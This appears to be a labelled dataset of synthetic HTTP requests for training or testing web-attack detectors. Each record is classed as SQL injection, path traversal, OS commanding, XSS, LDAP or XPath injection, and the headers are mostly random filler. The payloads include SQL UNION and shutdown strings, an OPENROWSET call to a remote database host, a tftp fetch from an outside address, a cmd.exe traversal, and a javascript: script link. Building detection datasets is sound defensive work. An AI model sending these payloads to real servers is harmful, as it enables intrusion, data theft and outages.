If-Range: Sun, 05 Apr 09 10:23:32 GMT
Max-Forwards: 3676
MIME-Version: 0.2
Pragma: becv5ads=tko7
Proxy-Authorization: Tbena sv18tb=rrtc1i
Authorization: NTLM ZWJlZnVjdHplbndhZWVkb2FUY2pkb21OVGRubXN0dHVzbG5oeHRlSDVqNWc=
Range: 12-
Referer: /eleeeona/T197m5c/xodh/ghaenaai.tiff
TE: deflate,chunked;q=0.9,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.2 (X11; U; Open BSD i586 7.8; nt-el; rv:9.1.1) Gecko/95888596
UA-CPU: x86
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2607x8764
Via: HTTP/3.0 www.rultehs.html, 3.8 193.254.34.238
Transfer-Encoding: gzip
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 958 171.58.48.221:65022 "tbsyeeovlI4la7he" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 9550547356245150782
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

z2seameet6rzGms=udSJGUf8Nj&sKx3ZUZ=75&ftdc0enec6=a6Ra5f4feson&@body3orx6UN8oVA=yuAXQd_&yoeiC1ur=f&Y93processing-instructionZb5j=7927207&2paFddrZsn=588&nhoc31aaaDx=2:eot&sneh=~OsVa&i5hrdib2oapBs7J=betrierzRtmod6o&eldtwSv5tauulyc=aaem'    or (i  < count(alua/child::text()) and   j    <     count(ee/child::comment())    and     k <    count(mdisg/child::*)   )  or     'iu'=' lsnlu2p'  or&hnawtadbe1o32=682456

End - Id: 48660
Start - Id: 41185
class: SqlInjection
GET /fxHbt6cVMblSJJ/aaeinhaioakAan/i0/rTln/oeoceo/sRUrV3fAX1-zFN/rrlcaex2Sfi8nbl/hSTpfFo4Kee4MJHIai/osXIincludej/a3.shtml?whl0jrzsez=494624&MLLsystemqkQx=lKe&Sta9oguneern0a=mu&lewshe0r=xIt8nnnek5hwt4nla&a6Eeoi1elsmt=eh%3B&0@1FdI=3s9myqae4Iirtiemlb&fSod=ewinnteh+o%24fi2untmu-&ud=no3form9acd+baacceptEa&shoofroO=lrperlso&_dTKUX=6193&lyh=9aelw1s HTTP/1.1
Host: www.seonnbai.biz
Connection: sal4n9
Accept: application/*, video/*, image/png;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: eykul1na-ok;q=0.9
Cache-Control: max-age=6
Client-ip: 113.86.11.180
Cookie: Zechl8d=mGsosrepat0i;KM-Bbt4nIlocation97=qr1tAt5oiesfr>h;wheredTZYvMpwhere=-bealleacnnaSl;8RQROE3i@RD=vcU_pd6
Cookie2: $Version="57"
Date: Mon, 25 Aug 08 18:41:27 UTC
ETag: W/"_l8P@QLsnmsdiTrc64C"
Expect: hnoeies=csaad7
From: eno8mf@36reSee.st
If-Modified-Since: Sat, 31 Mar 07 06:30:22 GMT
If-Unmodified-Since: Mon, 23 Feb 04 09:04:36 UTC
If-Match: *
If-None-Match: "ceix1PT.YXfQIG7"
If-Range: "kYzYHV1khiCHsYn-"
Max-Forwards: 179
MIME-Version: 2.7
Pragma: dqp7='ruN'
Proxy-Authorization: Basic dGxzUDpoZW92aQ==
Authorization: sda5A h990hii=Siyhyle
Range: 5154-283,-781,-71
Referer: /atxd/an2rsrcn/Awnr/hareg/selxs.rar
TE: gzip,trailers,trailers
Trailer: Date
User-Agent: '   ) UNION   ALL    SELECT  sJqtaalco    FROM     btStbade    WHERE  (    ''  =   '
UA-CPU: MIPS
UA-Disp: 8221,0714,8
UA-Color: color8
UA-Pixels: 724x926
Via: 8.9 9.233.143.28, 3.9 213.69.175.21, 4.4 143.168.216.31:1
Transfer-Encoding: identity
Upgrade: xeeyd/6.4
Warning: 570 20.88.197.170 "eeqmmpr1httetaoyox" 
X-Forwarded-For: 112.176.54.6
X-Serial-Number: 7584461693588
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 41185
Start - Id: 36242
class: PathTransversal
GET /teii/fpkhBincludekSDL/wgPFYcx53v/3ao7dfatnmtdatAuo/eK9/v1yh/asFh25ECkt/lh6hns.jpeg? HTTP/1.0
Host: 230.106.243.223
Connection: eiisehn
Accept: */*;q=0.4
Accept-Charset: shift_jis;q=0.0, iso-8859-2
Accept-Encoding: 
Accept-Language: \.\.\/\.\.\/etc\/eL.conf
Cookie2: $Version="742"
Date: Tue, 23 Dec 08 10:22:22 GMT
Expect: 100-continue
If-Modified-Since: Sat, 26 Jul 08 01:58:37 GMT
Max-Forwards: 7545
Pragma: no-cache
Referer: http://etce.com/cs9o/nAxltSe/aci1xnii/y9ferb/aenesx1t.css
User-Agent: Mozilla/1.8 (Machintosh; U; PPC 8.0; a4-hn; rv:4.5.3) Gecko/48253866
Via: 4esoLt/3.2 111.107.192.218, 6.2 www.ata8rnHR.gif
Transfer-Encoding: gzip

null

End - Id: 36242
Start - Id: 45758
class: PathTransversal
GET /tPaBzmxqdJJq/ahEqaA/ngucceb/uHG1@MM0FJ/ChtmpFJzt02/tTIFJIt44jWuMWh9Ay/t2tiohiti4nctalt/tt/j6tpuCqZC/nhnaiweeSlDdbGd/tstem.mdb?hedeNsullhr=0350083&m2rhrtoarofoiA=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat HTTP/1.1
Host: www.t6Ihsln.ch
Connection: keep-alive
Accept: text/xml, application/rtf;q=0.1, video/*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: io='Oet'
Client-ip: 94.195.108.172
Cookie: topeNaOserega=l]i;i.nw9hs3=Ot'1h;aabsoita=lhdrtettlOityeTi;fi30sa=ixjRqkI;deser=ore
Cookie2: $Version="51"
Date: Sat, 03 Apr 04 13:12:20 UTC
ETag: "NdluKyEsbt3wqR6uNr"
Expect: aameaew
From: nbuYYe@rnspS.ch
If-Modified-Since: Wed, 20 Sep 06 16:30:13 UTC
If-Unmodified-Since: Wed, 14 Oct 09 07:55:47 UTC
If-Match: "7Iprad7Mc-o95V3"
If-None-Match: "0wyDUnO7Su37hLVaUyh"
If-Range: "gJqyo3ohhngxeIbr"
Max-Forwards: 876
MIME-Version: 2.5
Pragma: yireiEs='newnt'
Proxy-Authorization: Basic ZXJsbnQ4OnN6Y2U=
Authorization: Bid3jw ermmy=OefhS
Range: -500252,934-3694
Referer: http://poRok.org/mOIio/rvabvwa/tuOno/agajntrE/yi8oia.fgf
TE: gzip;q=0.5,deflate;q=0.0
Trailer: From
User-Agent: sxelae (a8tn41dfba; r.h7Rg6; ldmplI; fnWsuf0xX)
UA-CPU: StrongARM
UA-Disp: 0244,7553,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 112x7031
Via: FTP/1.5 72.252.178.74
Transfer-Encoding: gzip
Upgrade: wMsS/2.7, cdte/4.8
Warning: 366 www.qjwrkE.jpg:272 "oMcna8llngods" 
X-Forwarded-For: 156.175.229.133
X-Serial-Number: 8409681186997
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45758
Start - Id: 44177
class: OsCommanding
GET ..��...��..��..��..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.ebeo.com
Connection: close
Accept: application/rtf
Accept-Charset: iso-8859-2, ks_c_5601-1987;q=0.9, windows-874, iso-8859-1;q=0.6, ks_c_5601-1987
Accept-Encoding: gzip, deflate, deflate;q=0.0, deflate, compress;q=0.4
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 206.218.166.35
Cookie: tmeta50document4G-6=pix_pxXbLf-;dVWmLPwB=3897805590;meiDtaw=)
Cookie2: $Version="987"
Date: Wed, 08 Dec 04 17:35:08 GMT
ETag: "@pQtfkHChnDufap0Uh"
Expect: 100-continue
From: ulnbn@Ssrnr.st
If-Modified-Since: Sat, 10 Sep 05 12:53:37 CET
If-Unmodified-Since: Thu, 07 May 09 22:07:52 CET
If-Match: *
If-None-Match: "SzWwgNJNdiIahrV"
If-Range: "AvkLyqn-Wja6WIX1@Hj"
Max-Forwards: 3
MIME-Version: 3.5
Pragma: t=n
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: Digest username="jhemspy"
Range: 5-,-97,-5
Referer: /ehxhoe/tdomeme/ewpt/ehetcm3s.pdf
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/8.6 (Windows; U; Win98 5.8; sd-ni; rv:1.9.7) Gecko/99003638
UA-CPU: StrongARM
UA-Disp: 054,707,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 389x154
Via: 0.6 252.49.31.229:7678
Transfer-Encoding: identity
Upgrade: llemvt/2.2, yAhrud/8.0, Cskdn/9.3
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 103.223.39.110
X-Serial-Number: 338223
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44177
Start - Id: 36756
class: OsCommanding
GET /afyzRRlj/risw6ozlUste1iaTnlsj/osncwc/sotc3re/ibattUOOe3artZuEt/t2h24Z/sN7.asmx?ficwaoouaiwEAnp=g%40GIJ_GnJH&NdkruscaRcj1a=%27+++%3Buftp+++-g++++%2Fhome%2Fledela%2Filroal+69.173.216.135++++%2Fve+++++%3B&syis6as7rysee=i1thltieEube&aiuenfisse=crt%3E%5Dbetweenuth+&OtaeazuwimtdS=hads4yufnghen&uieh=41556377&5Ie4@KT=o6FeHGN. HTTP/1.0
Host: www.kpe5sRtA.ch
Connection: me44
Accept: application/postscript;q=0.8, video/quicktime
Accept-Charset: *
Accept-Encoding: deflate;q=0.4, identity, deflate;q=0.7, deflate
Accept-Language: *
Cache-Control: min-fresh=1410
Client-ip: 130.81.190.203
Cookie: QPCSXmb25=t=aW;dtmoe=37CqSshutdownoyxo4m;qn=113926033
Cookie2: $Version="576"
Date: Tue, 04 Oct 05 24:36:36 GMT
ETag: W/"nq-5AohjOXHMiQfI"
Expect: 100-continue
From: 1Ruwies@Rllsdtnt.st
If-Modified-Since: Wed, 19 May 04 04:29:15 UTC
If-Unmodified-Since: Sun, 03 Aug 08 14:20:54 UTC
If-Match: "AcodqUqxsT1b9Y33"
If-None-Match: "HfjEhsKvvX7hEI24"
If-Range: "XISmt7q2iLSY2FHm"
Max-Forwards: 3
MIME-Version: 5.1
Pragma: rrne=tmgtw
Proxy-Authorization: Digest response="49a2dbb09A077a8FDd2baA76dAA5E5dd"
Authorization: Basic RDFpbjU6dHNpbGJPcGY=
Range: 8-,6-50
Referer: /u4oaa.gz
TE: deflate,trailers,gzip;q=0.4
Trailer: Cache-Control
User-Agent: slRwyutn5 (hm@PPbq6)
UA-CPU: x86
UA-Disp: 944,674,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 232x1783
Via: 6.1 215.249.75.54
Transfer-Encoding: gzip
Upgrade: m25Nxw/7.3, m4ur5a/7.5, dhis/6.5, Ote/9.2, ant/5.0
Warning: 508 www.fetrah.tiff "t7sycuhIpesS" "Wed, 10 Feb 10 05:46:21 GMT"
X-Forwarded-For: 128.194.144.121
X-Serial-Number: 51873709956197
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36756
Start - Id: 46006
class: PathTransversal
POST /3QjEel9jDY/CererwEf3msreeNt5/tX8D1.D9E/ai47semhsb/eizNl.Wk8R/tpde0Zg/nVnqbAoaccept0/gyqVedGVuS9lkii/EesAz/iFkVhS/gn/gNdJUtltyl8Natd.bin? HTTP/1.0
Content-Length: 93
Content-Language: e,eh
Content-Encoding: deflate
Content-Location: /dhcnaQoZ/zam9/hcOttde.tiff
Content-MD5: VE1QdHQ0emRxdW9vbmR5bA==
Content-Type: application/x-www-form-urlencoded
Host: www.duunu.fr:80
Connection: hbLoldDI
Accept: application/postscript, image/gif
Accept-Charset: x-mac-ce, windows-1250
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: gSlQc=eavca8
Client-ip: 183.222.19.185
Cookie: eQTi9phpGE=48525488;srtqT=\autoexec.bat;iean2iythtooa=7;ZdtdetT8Ege=bsaseletw9rhf46;PNpNnyE=i-
Date: Thu, 04 Dec 08 21:16:34 CET
ETag: "p6c2J@xa@x52xK2D7K"
If-Unmodified-Since: Thu, 01 Jul 04 24:09:47 CET
If-Match: *
If-None-Match: "ZN-9.v3m-BxjyC64"
If-Range: "ONVCf9BQheERPbdKu"
Pragma: no-cache
Referer: http://www.eludab.fr/losoud/qhrd/Thfqpnl/se3oN/0iamo.pdf
User-Agent: Mozilla/4.0 (Machintosh; U; PPC 4.1; u2-es; rv:1.3.2) Gecko/08356157
Via: 3.7 www.na1t.png:911, HTTP/4.0 209.188.225.12, HTTP/9.5 80.116.253.180
Transfer-Encoding: deflate
Upgrade: iuw/5.4, l3gi4/7.6, DrEeu7/0.6, o1deOs/9.1, aems/3.3
Warning: 359 www.ttamz.css:0398 "wrTo" "Fri, 19 Jan 07 02:22:51 CET"
~~~~~: ~~~~~~~~~~~~~

sagncoeL6=yrh&4Uh1tdn5jet=65082463&HjM6homeM=r2t+pdsdqe]n=htelnet&e7gtpmtodau=@eI< 

End - Id: 46006
Start - Id: 42129
class: SqlInjection
GET /87CANt0processing-instruction7MP5C/r47fut/nttcQesit.css?ed=%27%3B+shutdown--&raysmdE=HuahluLbpd6X&kpn4Tnoadro=rrdCQpww.Z&httpsjXQcmdX=dRReCgk7&7L8NGOd8=itin%29aeIesj&leAnliLmaetk=t%3Bv&ezeseNosa=t%7E%5CeooerRt%3B%5De0aE%3Dna&35i0iee=e HTTP/1.1
Host: www.ltdzonoig.com
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: hz-gb-2312;q=0.6, x-mac-japanese;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: mss=tere
Client-ip: 17.1.72.59
Cookie: tnrt4yDh=2322283835;YmQ77netcathtpass=lNtetiadmql;mA4frqinelLtb=87;7tphod7yuc=iZTH9j7V;efaesfd=nm&tncopen4emwtl]aechoe?i
Cookie2: $Version="8"
Date: Mon, 19 Sep 05 13:38:21 GMT
ETag: "36ABV77V@jd_sdUj"
Expect: ahiWkN=nO6ei
From: islI@rcdrtQr.org
If-Modified-Since: Fri, 08 Sep 06 13:58:39 CET
If-Unmodified-Since: Tue, 19 Jun 07 20:21:13 GMT
If-Match: "Sy0KgaDB6wnsz4F"
If-None-Match: *
If-Range: "-t@QcvOSPbfghpj2hrd."
Max-Forwards: 728
MIME-Version: 7.0
Pragma: Ns=vn8eitr
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic bjh0MHZkNzpzT1Vu
Range: 80-3804,023297-91,09-
Referer: http://www.seftseo.org/ntet/v1oruw/uUR9s/s1oifb/edtalegf.php
TE: deflate;q=0.7
Trailer: Range
User-Agent: strhdhu/7.7
UA-CPU: MIPS
UA-Disp: 3899,512,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1285x9347
Via: HTTP/0.1 www.xang.gif, iay/2.4 160.19.139.125:6
Transfer-Encoding: deflate
Upgrade: teh/9.0, ittnn/5.6, ohtcp/8.9
Warning: 210 www.mTetdThm.shtml "LTt1suesam" "Fri, 22 Feb 08 23:40:02 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 45705
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42129
Start - Id: 44787
class: PathTransversal
GET /4MYcYjSvnKYPL/lGITisV0dM@pl0qu4L/lwWno4Z.Dcmd7htpassVx/e3c.eSYych52bi/2GKMrz.AVP6c7rOMrN/xfBiG7H/1pnhtpassh0.jpeg?wvLPul7eres=gJ_90AmTtv&cwrft=tRilceeOlvdfimh&rnqAin2tihlhtea=eu%3BE&n_jz=l4Imbycit&2Kmailyz7T8O=7&etnoaa=file%3A%2F%2F%2Ft%3A%2Fsma%2Fir%2Ftes.xml&e724=3jeite&prcMcfmwod=cat%29fe&ke0Fncppqee8l=+ngs%7CgEJTcrn8e&dXR7=awnidarpottmRog6s&lIrlohldatisEi=ra4coElonfa20Laibu&fns2cap7aneoni=1959 HTTP/1.0
Host: www.lbocArw.net
Connection: close
Accept: text/html, text/*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 108.193.198.116
Cookie: neet=9157226;pWuvrbnuh=df|
Cookie2: $Version="24"
Date: Sat, 15 Jul 06 18:36:40 CET
ETag: "iFE2lKQFDoEmCoaqzw"
Expect: 100-continue
From: Cmaxdcp@rimabEod.be
If-Modified-Since: Mon, 27 Mar 06 13:37:41 GMT
If-Unmodified-Since: Sat, 20 Feb 10 11:26:53 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 0.5
Pragma: cTE='aMn'
Proxy-Authorization: NTLM c0lyb3NlYTRVYWluMmhpY3d0YnRCZXRUd3l0dGNlb2RvdXRyZGx2cnlh
Authorization: Basic bnRydEJlQTpxbWRR
Range: 39-79901,6-
Referer: http://www.eao4.ch/9etib/ebtntxuu/n8eoa/iwirtstt/ie2kdym2.asmx
TE: deflate;q=0.1,trailers,deflate;q=0.7
Trailer: Expect
User-Agent: Mozilla/6.8 (compatible; MSIE 0.0; Mac OS X; Jtolge)
UA-CPU: MIPS
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 822x152
Via: 1.2 160.216.253.69
Transfer-Encoding: hhTvto
Upgrade: esi/8.5, tw4ftd/0.3, 7ja/8.6, tnxgiT/3.3
Warning: 136 www.f72ts.jpeg "daakn3ltgiptelaits" "Sat, 10 Oct 09 20:12:41 UTC"
X-Forwarded-For: 87.170.85.167
X-Serial-Number: 2157159271334
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44787
Start - Id: 42636
class: SqlInjection
GET /t7h37eVhlsRP/tLivhTrnpohoGaa/adeo1ov2eAthn/gCs3/floo.js?lalqne=OR++%27i61Ie%27+++++IN+++%28+%27+%27++++%29 HTTP/1.1
Host: 90.15.161.153:80
Connection: keep-alive
Accept: text/*;q=0.0, image/png;q=0.7, audio/*;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: 8-8hcuwcs, aeuss0-ne9oi, ailn-hzLE;q=0.6
Cache-Control: no-cache
Client-ip: 107.228.29.96
Cookie: Nchheoa=zessin;7CZPdeleteF=6e7os;JKBR=siMtk
Cookie2: $Version="7"
Date: Fri, 17 Sep 04 06:06:04 CET
ETag: "w8Zou2YQekyqpbQNzJ"
Expect: 100-continue
From: gotca@lpobi9rhDa.org
If-Modified-Since: Thu, 09 Oct 08 18:24:40 GMT
If-Unmodified-Since: Mon, 09 Aug 04 22:26:17 GMT
If-Match: "GDnsZ-T4oXz66QlP"
If-None-Match: *
If-Range: Sat, 19 Nov 05 17:56:43 CET
Max-Forwards: 1
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: NTLM OTFveGhqbGFlMHRvb2FkaXJPY3NxOG1zdGFmM3Rzam5SdmU=
Range: 72326-9838
Referer: /snps/hrbmtlme.gif
TE: deflate
Trailer: Warning
User-Agent: Mozilla/0.1 (Machintosh; U; PPC Mac OS X 8.7; ae-ue; rv:7.0.5) Gecko/27063309
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4720x346
Via: 0.0 185.152.146.141:3
Transfer-Encoding: compress
Upgrade: aewi9/5.5, sfsc/6.0, tiEao/8.7
Warning: 162 www.tgbma.css:1 "eWemetp9erNow3n" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 81024686129
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42636
Start - Id: 42837
class: OsCommanding
GET /7lam2odHew8l9us/iotnzvbd7cqwegie/dfbt7etsrtadphoii/ohosanhqeI/niotaoAdbcdomwhchi.msf?e5dsmjguat7Aac=are0Sx&J_jxterm=%7C+++++dir++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C++++%2C&em=pLU_l HTTP/1.1
Host: 244.133.120.84
Connection: close
Accept: application/rtf, image/*, image/png
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 129.42.74.202
Cookie: rpselaPn=57373556
Date: Fri, 09 Oct 09 08:40:31 UTC
ETag: W/"ef0WQgxn5Q51Zfuc1"
Expect: 2iteirO
From: otsveiea@oarDol.com
If-Modified-Since: Wed, 11 Mar 09 24:33:52 CET
If-Unmodified-Since: Sat, 24 Sep 05 20:33:19 CET
If-Match: "rSD.yOe1z@Ndqsma"
If-None-Match: *
If-Range: *
Max-Forwards: 88
MIME-Version: 7.9
Pragma: gljue=Tsle
Authorization: 8w6nte apoS8=aisrnil5
Range: -885,-18051
Referer: http://Ptzfmi.uk/d0ae0a.gif
TE: trailers,chunked
Trailer: Host
User-Agent: Mozilla/4.6 (compatible; MSIE 1.2; Open BSD i386; Ieinh; 0tdtn)
UA-CPU: StrongARM
UA-Disp: 1330,7116,16
UA-Color: color32
Via: 0.7 212.160.95.7:2087, FTP/1.3 229.192.98.243, 9.7 www.rn4b.html
Transfer-Encoding: identity
Upgrade: NhTeWO/2.9, teisee/0.9
Warning: 697 www.atUa.htm "itafi4b9c" 
X-Forwarded-For: 209.98.157.41
----: -------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 42837
Start - Id: 47194
class: XSS
GET /2nyA9if.tiff?seers6talerrW=%3Ca++href++%3D++++%22javas%26%2399%3Bript%26%2335%3B%5Balert+%28%27tatldb1srg%27%29%3B%5D+++++%22++++%3E HTTP/1.0
Host: 249.200.135.138
Connection: keep-alive
Accept: text/html;q=0.2
Accept-Charset: x-mac-cyrillic, macintosh;q=0.4, shift_jis, x-mac-ce, macintosh
Accept-Encoding: 
Accept-Language: gd-6tOd4r
Cache-Control: no-transform
Client-ip: 34.140.216.85
Cookie: iarbsitmelUo=52;eddhS=4vF;JOnullx=87012;CDpjN=933017345;da=dztcedi;RP0uW9b=3111564
Cookie2: $Version="4"
Date: Mon, 25 Sep 06 06:30:33 UTC
ETag: W/"M.D_V9Hhyz7aLO5"
Expect: 100-continue
From: odfe4mcc@abteyQ.be
If-Modified-Since: Tue, 19 Jun 07 18:03:16 UTC
If-Unmodified-Since: Sun, 12 Jun 05 13:30:07 CET
If-Match: "RRAglu8YSeaNw1b6Zc@C"
If-None-Match: *
If-Range: Fri, 24 Nov 06 04:38:48 UTC
Max-Forwards: 1
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic OG53NmFmOnNoc0FuYXA=
Authorization: Digest realm
Range: 62-80366,-217,68-
Referer: http://tttl.de/Jeohoh/zainl/l2iarx/efdvfiRr.cgi
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: nhl6lrtoypenertsa
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 739x565
Via: 5.2 155.192.181.117, 1.3 209.84.28.244, wmey/6.1 www.chxtd.html
Transfer-Encoding: deflate
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 683 181.248.214.19 "qlt9unMovxwdh" "Tue, 18 Jan 05 01:02:04 UTC"
X-Forwarded-For: 25.149.50.16
X-Serial-Number: 533969856895
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47194
Start - Id: 41770
class: SqlInjection
GET /2@l.aZLU3FOzy8Ju/hT7IPT@vlikeqobject/17so/NIYeuinclude/rsoEags/ua/reorSXxgYRL/v4tDnurop3Somnh0s/wtthm810tbhsrCisrne.cgi?78S8wKC4x0=arodyoeWzne&Tr=uymeraejuelcSo&edsaohztt0ells=5stoua&o2DhzrtlRm=oinweolatmncaieh&nEM_=ok%40OJbiM&d0t=%3FaaiytrSihme&9f3qD8u=chditmp&mat=%3B+insert+++++into++OPENROWSET%28++++%27SQLoledb%27%2C%27uid%3Dpi%3Bpwd%3Dmts3n%3BNetwork%3DDBMSSOCN%3BAddress%3D126.85.192.9%2C1433%3B%27%2C%27select++*++++from++++_sysdatabases%27%29%3B+select++*++from+++LinkedOrRemoteSrv1.master.dbo.sysdatabases&heD=raoekia&ckam=mleSYfnt+&mal=pHoost&FAovR.yuO5u=nheou&nph-group bylsmkP=tgmL&tcuEetpcntniI=oh6+%7Eautoexec4 HTTP/1.0
Host: www.hmtir.cz
Connection: close
Accept: image/*;q=0.7, text/html
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=50
Client-ip: 141.135.3.12
Cookie: 2buSlhoiowjh=8709;EoSgaiesA0ciu=inahiiglsf0s;bunotttN=629;dasnlutea=l9Eugnetcatbgsounds+;YNyf=20890102
Cookie2: $Version="86"
Date: Thu, 17 Sep 09 13:19:51 UTC
ETag: "Ml8sUtHi-YLnzJaoSF"
Expect: osevnd
From: edbsae7@m3iuOei.biz
If-Modified-Since: Thu, 06 Apr 06 12:29:25 CET
If-Unmodified-Since: Fri, 29 Jun 07 20:14:16 CET
If-Match: *
If-None-Match: "1jcCyg7mmJJYtY2.u-"
If-Range: *
Max-Forwards: 3
MIME-Version: 5.2
Pragma: y5yei=tbh
Proxy-Authorization: Basic eFN3ZXlpczp0ZWVybXRi
Authorization: NTLM bDZxZXdoeTV3NmRlYXNtZXNoZXJ1eWRlNmFsZGFodDVsbHR5Yg==
Range: 4234-490888,-164882
Referer: /Gst2/Tuxq/nmdhei/hvGsnr.txt
TE: chunked;q=0.9
Trailer: Upgrade
User-Agent: eqgnglV5q http://www.erfhjxto.net
UA-CPU: 68000
UA-Disp: 740,6527,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5624x146
Via: 5.5 www.6rsp7e.css, 3.0 144.140.49.88, 0.9 208.254.33.86
Transfer-Encoding: compress
Upgrade: baE/8.7, 0es9t/8.9, lisu/3.1, ncnHe/5.8, iuj/3.3
Warning: 047 www.s7aieai.js "nisluLPLAsoy" "Fri, 29 Jun 07 15:53:33 GMT"
X-Forwarded-For: 126.254.87.29
X-Serial-Number: 79451842006720281
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41770
Start - Id: 37963
class: LdapInjection
GET /mOmie/e1vAAwuc6vTyDf9-/I4/Bnaentcesoccai2Or/HzYfuj.png?efdnam9eh=%29++++%28%7C+%28displayName%3Dhad*%29%28name++++%3D+++had*++++%29%28mail%3Dhad*++%29&sn=vWFfEcY&_YKDBmVandyP=uetelycNrUoltb&rfur=ecuah2esnS&tmir=is02otneai&tsto=tCkxVy5hOKr9&rt=teh&tcie25nnu=hlddb&1samCKo=7%5Cni&TKwinntLaTDh3Y=%3Ci9 HTTP/1.0
Host: www.lroiEd.org:80
Connection: close
Accept: application/rtf;q=0.6, application/*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 177.141.172.83
Cookie: yaabistglStt=jbN;jefQQGZnhg=na
Cookie2: $Version="12"
Date: Mon, 17 Dec 07 24:31:17 UTC
ETag: "uFJw6.PG8Rdmb4i"
Expect: eaoO=oeUp;rAeiwo7
From: ob6jr0@oucA7niAri.it
If-Modified-Since: Sat, 15 Jan 05 17:55:44 GMT
If-Unmodified-Since: Fri, 30 Sep 05 08:11:49 GMT
If-Match: "Zd.LX6.txXMsGynC"
If-None-Match: *
If-Range: "HHGLgH@t25Ogq-B"
Max-Forwards: 184
MIME-Version: 8.4
Pragma: upmui=a3yvt
Proxy-Authorization: Digest qop=auth
Authorization: NTLM UmV0aGlwb3Jzc2VpYWxyaTNpb2ltRW1PYTdxZXRwbmRHbWU4Ng==
Range: -8,482604-
Referer: /3ccmalh/earonal/odhihft/hjcezaS.asmx
TE: chunked;q=0.8,chunked
Trailer: Warning
User-Agent: Mozilla/7.8 (Machintosh; U; PPC Mac OS X 9.3; mu-dn; rv:1.0.8) Gecko/37875720
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8848x2681
Via: 6.4 www.u9ig.gif, 8.1 www.osrte.png, 3.9 110.173.46.242
Transfer-Encoding: identity
Upgrade: meng/6.1, eFlrhd/9.3, 8sNla/8.7
Warning: 700 www.fia1N.gif "guys2ngneaoLs2joonsi" "Fri, 30 Dec 05 15:06:31 CET"
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 8812591
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37963
Start - Id: 49442
class: XPathInjection
